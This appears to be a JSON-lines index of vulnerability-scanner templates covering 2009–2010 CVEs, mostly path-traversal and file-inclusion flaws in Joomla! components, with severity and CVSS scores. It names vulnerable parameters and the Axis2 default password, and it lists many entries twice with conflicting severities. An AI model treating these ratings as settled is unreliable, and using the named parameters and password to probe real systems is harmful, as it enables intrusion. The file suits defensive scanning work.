{"ID":"CVE-2009-5020","Info":{"Name":"AWStats \u003c 6.95 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability in awredir.pl in AWStats \u003c 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2009/CVE-2009-5020.yaml"}
{"ID":"CVE-2009-5114","Info":{"Name":"WebGlimpse 2.18.7 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2009/CVE-2009-5114.yaml"}
{"ID":"CVE-2009-5020","Info":{"Name":"AWStats \u003c 6.95 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability in awredir.pl in AWStats \u003c 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2009/CVE-2009-5020.yaml"}
{"ID":"CVE-2009-5114","Info":{"Name":"WebGlimpse 2.18.7 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2009/CVE-2009-5114.yaml"}
{"ID":"CVE-2010-0157","Info":{"Name":"Joomla! Component com_biblestudy - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0157.yaml"}
{"ID":"CVE-2010-0219","Info":{"Name":"Apache Axis2 Default Login","Severity":"high","Description":"Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2010/CVE-2010-0219.yaml"}
{"ID":"CVE-2010-0219","Info":{"Name":"Apache Axis2 Default Login","Severity":"critical","Description":"Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2010/CVE-2010-0219.yaml"}
{"ID":"CVE-2010-0467","Info":{"Name":"Joomla! Component CCNewsLetter - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2010/CVE-2010-0467.yaml"}
{"ID":"CVE-2010-0696","Info":{"Name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0696.yaml"}
{"ID":"CVE-2010-0696","Info":{"Name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","Severity":"medium","Description":"A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0696.yaml"}
{"ID":"CVE-2010-0759","Info":{"Name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0759.yaml"}
{"ID":"CVE-2010-0942","Info":{"Name":"Joomla! Component com_jvideodirect - Directory Traversal","Severity":"high","Description":"Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0942.yaml"}
{"ID":"CVE-2010-0943","Info":{"Name":"Joomla! Component com_jashowcase - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0943.yaml"}
{"ID":"CVE-2010-0944","Info":{"Name":"Joomla! Component com_jcollection - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0944.yaml"}
{"ID":"CVE-2010-0942","Info":{"Name":"Joomla! Component com_jvideodirect - Directory Traversal","Severity":"medium","Description":"Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0942.yaml"}
{"ID":"CVE-2010-0943","Info":{"Name":"Joomla! Component com_jashowcase - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0943.yaml"}
{"ID":"CVE-2010-0944","Info":{"Name":"Joomla! Component com_jcollection - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0944.yaml"}
{"ID":"CVE-2010-0972","Info":{"Name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0972.yaml"}
{"ID":"CVE-2010-0982","Info":{"Name":"Joomla! Component com_cartweberp - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-0982.yaml"}
{"ID":"CVE-2010-0982","Info":{"Name":"Joomla! Component com_cartweberp - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-0982.yaml"}
{"ID":"CVE-2010-0985","Info":{"Name":"Joomla! Component com_abbrev - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0985.yaml"}
{"ID":"CVE-2010-1056","Info":{"Name":"Joomla! Component com_rokdownloads - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1056.yaml"}
{"ID":"CVE-2010-1081","Info":{"Name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1081.yaml"}
{"ID":"CVE-2010-1217","Info":{"Name":"Joomla! Component \u0026 Plugin JE Tooltip 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1217.yaml"}
{"ID":"CVE-2010-1219","Info":{"Name":"Joomla! Component com_janews - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1219.yaml"}
{"ID":"CVE-2010-1302","Info":{"Name":"Joomla! Component DW Graph - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1302.yaml"}
{"ID":"CVE-2010-1304","Info":{"Name":"Joomla! Component User Status - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1304.yaml"}
{"ID":"CVE-2010-1305","Info":{"Name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1305.yaml"}
{"ID":"CVE-2010-1056","Info":{"Name":"Joomla! Component com_rokdownloads - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1056.yaml"}
{"ID":"CVE-2010-1081","Info":{"Name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1081.yaml"}
{"ID":"CVE-2010-1217","Info":{"Name":"Joomla! Component \u0026 Plugin JE Tooltip 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1217.yaml"}
{"ID":"CVE-2010-1219","Info":{"Name":"Joomla! Component com_janews - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1219.yaml"}
{"ID":"CVE-2010-1302","Info":{"Name":"Joomla! Component DW Graph - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1302.yaml"}
{"ID":"CVE-2010-1304","Info":{"Name":"Joomla! Component User Status - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1304.yaml"}
{"ID":"CVE-2010-1305","Info":{"Name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1305.yaml"}
{"ID":"CVE-2010-1306","Info":{"Name":"Joomla! Component Picasa 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1306.yaml"}
{"ID":"CVE-2010-1307","Info":{"Name":"Joomla! Component Magic Updater - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1307.yaml"}
{"ID":"CVE-2010-1308","Info":{"Name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1308.yaml"}
{"ID":"CVE-2010-1312","Info":{"Name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1312.yaml"}
{"ID":"CVE-2010-1313","Info":{"Name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1313.yaml"}
{"ID":"CVE-2010-1314","Info":{"Name":"Joomla! Component Highslide 1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1314.yaml"}
{"ID":"CVE-2010-1315","Info":{"Name":"Joomla! Component webERPcustomer - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1315.yaml"}
{"ID":"CVE-2010-1340","Info":{"Name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1340.yaml"}
{"ID":"CVE-2010-1345","Info":{"Name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1345.yaml"}
{"ID":"CVE-2010-1352","Info":{"Name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1352.yaml"}
{"ID":"CVE-2010-1353","Info":{"Name":"Joomla! Component LoginBox - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1353.yaml"}
{"ID":"CVE-2010-1354","Info":{"Name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1354.yaml"}
{"ID":"CVE-2010-1429","Info":{"Name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","Severity":"medium","Description":"Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about \"deployed web contexts\" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2010/CVE-2010-1429.yaml"}
{"ID":"CVE-2010-1461","Info":{"Name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2010/CVE-2010-1461.yaml"}
{"ID":"CVE-2010-1469","Info":{"Name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1469.yaml"}
{"ID":"CVE-2010-1307","Info":{"Name":"Joomla! Component Magic Updater - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1307.yaml"}
{"ID":"CVE-2010-1308","Info":{"Name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1308.yaml"}
{"ID":"CVE-2010-1312","Info":{"Name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1312.yaml"}
{"ID":"CVE-2010-1313","Info":{"Name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1313.yaml"}
{"ID":"CVE-2010-1314","Info":{"Name":"Joomla! Component Highslide 1.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1314.yaml"}
{"ID":"CVE-2010-1315","Info":{"Name":"Joomla! Component webERPcustomer - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1315.yaml"}
{"ID":"CVE-2010-1340","Info":{"Name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1340.yaml"}
{"ID":"CVE-2010-1345","Info":{"Name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1345.yaml"}
{"ID":"CVE-2010-1352","Info":{"Name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1352.yaml"}
{"ID":"CVE-2010-1353","Info":{"Name":"Joomla! Component LoginBox - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1353.yaml"}
{"ID":"CVE-2010-1354","Info":{"Name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1354.yaml"}
{"ID":"CVE-2010-1429","Info":{"Name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","Severity":"medium","Description":"Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about \"deployed web contexts\" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1429.yaml"}
{"ID":"CVE-2010-1461","Info":{"Name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1461.yaml"}
{"ID":"CVE-2010-1469","Info":{"Name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1469.yaml"}
{"ID":"CVE-2010-1470","Info":{"Name":"Joomla! Component Web TV 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1470.yaml"}
{"ID":"CVE-2010-1471","Info":{"Name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1471.yaml"}
{"ID":"CVE-2010-1472","Info":{"Name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1472.yaml"}
{"ID":"CVE-2010-1473","Info":{"Name":"Joomla! Component Advertising 0.25 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1473.yaml"}
{"ID":"CVE-2010-1474","Info":{"Name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1474.yaml"}
{"ID":"CVE-2010-1475","Info":{"Name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Preventive \u0026 Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1475.yaml"}
{"ID":"CVE-2010-1476","Info":{"Name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1476.yaml"}
{"ID":"CVE-2010-1478","Info":{"Name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1478.yaml"}
{"ID":"CVE-2010-1491","Info":{"Name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1491.yaml"}
{"ID":"CVE-2010-1494","Info":{"Name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1494.yaml"}
